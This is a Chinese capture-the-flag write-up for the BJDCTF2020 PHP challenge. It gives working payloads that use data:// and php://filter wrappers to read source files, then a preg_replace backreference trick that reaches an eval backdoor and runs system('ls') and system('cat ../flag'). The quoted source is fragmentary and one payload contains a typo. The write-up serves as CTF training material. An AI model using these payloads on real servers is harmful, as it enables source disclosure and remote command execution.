[BJDCTF2020]ZJCTF，不过如此1

提示

1. 伪协议的各种应用

1.  首先我们来一步一步分析

   首先要判断text是否传入参数，并且将传入的text以只读的方式打开要绝对等于I have a dream才会进入下一步

   这里需要用到伪协议data://text/plain或者php://input都可以

   

2.  最终要利用到这个include包含函数

   这里提示了next.php，file参数里不能有flag

   

这里我们构造payload

?text=data://text/plain,I%20have%20a%20dream&file=next.php

成功包含了next.php页面但是并没有什么有用信息

重新构造payload读取next.php源码

?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php

解码后获得

 $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

从整个代码来看

我们需要利用到getFlag（）这个函数，但是并没有引用，所以就得想办法让可以使用这个函数

这里就需要用到PHP正则表达式的逆向引用与子模式

函数preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

在 subject 中搜索 pattern 模式的匹配项并替换为 replacement。如果指定了 limit，则仅替换 limit 个匹配，如果省略 limit 或者其值为 -1，则所有的匹配项都会被替换。
replacement可以包含\\n形式或$n形式的逆向引用，n可以为0到99，\\n表示匹配pattern第n个子模式的文本，\\0表示匹配整个pattern的文本。

所谓“子模式”就是：$pattern参数中被圆括号括起来的正则表达式（pattern即为模式）。

现在开始构造payload

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls');

括号内需要用到什么函数就填什么函数，这里我们需要用到getFlag()函数里的eval来执行命令

直接去查看网站根目录

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls ../../../../../');

找到flag

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat ../../../../../flag');